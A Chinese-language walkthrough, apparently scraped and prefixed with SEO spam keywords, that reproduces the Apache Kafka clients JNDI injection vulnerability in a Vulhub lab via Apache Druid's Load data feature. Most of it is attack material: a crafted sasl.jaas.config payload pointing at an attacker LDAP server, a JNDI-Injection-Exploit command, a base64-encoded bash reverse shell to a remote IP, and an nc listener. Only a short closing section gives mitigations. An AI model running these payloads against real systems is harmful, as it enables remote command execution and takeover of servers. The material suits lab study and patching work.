上海网站建设seo1888,玉溪网站建设制作,WordPress建立文档系统,关键词权重如何打造基于Vulhub搭建的环境
一、漏洞概述
Apache Kafka是一个开源分布式消息队列#xff0c;Kafka clients是相对应的Java客户端。
在版本3.3.2及以前#xff0c;Apache Kafka clients中存在一处JNDI注入漏洞。如果攻击者在连接的时候可以控制属性的值为#xff0c;则可以发起…基于Vulhub搭建的环境
一、漏洞概述
Apache Kafka是一个开源分布式消息队列Kafka clients是相对应的Java客户端。
在版本3.3.2及以前Apache Kafka clients中存在一处JNDI注入漏洞。如果攻击者在连接的时候可以控制属性的值为则可以发起JNDI连接进而导致JNDI注入漏洞执行任意命令。sasl.jaas.configcom.sun.security.auth.module.JndiLoginModule 由于这个漏洞是存在于Java库kafka-clients中所以我们需要在真实环境下找到使用了这个库的软件且用户可以控制连接参数。 这个软件就是Apache Druid其使用kafka-clients来连接Kafka作为其数据源之一。
二、影响范围
2.3.0 Apache Kafka 3.3.2
三、漏洞复现
1、访问IP:8888启动Apache Druid漏洞在Load data中。 NEXT NEXT 抓取的数据包样例只取关键 构造恶意的LDAP URL将对应位置替换
bootstrap.servers:127.0.0.1:6666,sasl.mechanism:SCRAM-SHA-256,security.protocol:SASL_SSL,sasl.jaas.config:com.sun.security.auth.module.JndiLoginModule required user.provider.url\ldap://192.168.111.4:1389/xxxxxx\ useFirstPass\true\ serviceName\x\ debug\true\ group.provider.url\xxx\;实现原理 攻击者启动 LDAP 服务器并反序列化 LDAP 响应攻击者可以使用该响应在 kafka 连接服务器上执行 java 反序列化链。 database.history.producer.sasl.jaas.configio.debezium.connector.mysql.MySqlConnectorcom.sun.security.auth.module.JndiLoginModule required user.provider.url“ldap://attacker_server” useFirstPass“true” serviceName“x” debug“true” group.provider.url“xxx”; getshell
1、JNDIExploit启动一个恶意的JNDI服务器,开启LDAP服务利用此工具直接反弹shell提取权限 样式
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C 反射shell命令需要bash编码 -A ipbash反弹shell编码前
bash -i /dev/tcp/192.168.111.3/9999 01将其进行编码
bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjExMS4zLzk5OTkgMD4mMQ}|{base64,-d}|{bash,-i}实例
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjExMS4zLzk5OTkgMD4mMQ}|{base64,-d}|{bash,-i} -A 192.168.111.32、开启监听
nc -lvvp 99993、利用此处反弹shell成功的前提是VPSIP地址需要低版本的jdk 4、点击发送静候几秒钟反弹shell成功
四、漏洞防护
1、升级系统版本。 2、无法升级的用户可通过验证Kafka Connect连接器配置仅允许受信任的JNDI配置来缓解此漏洞。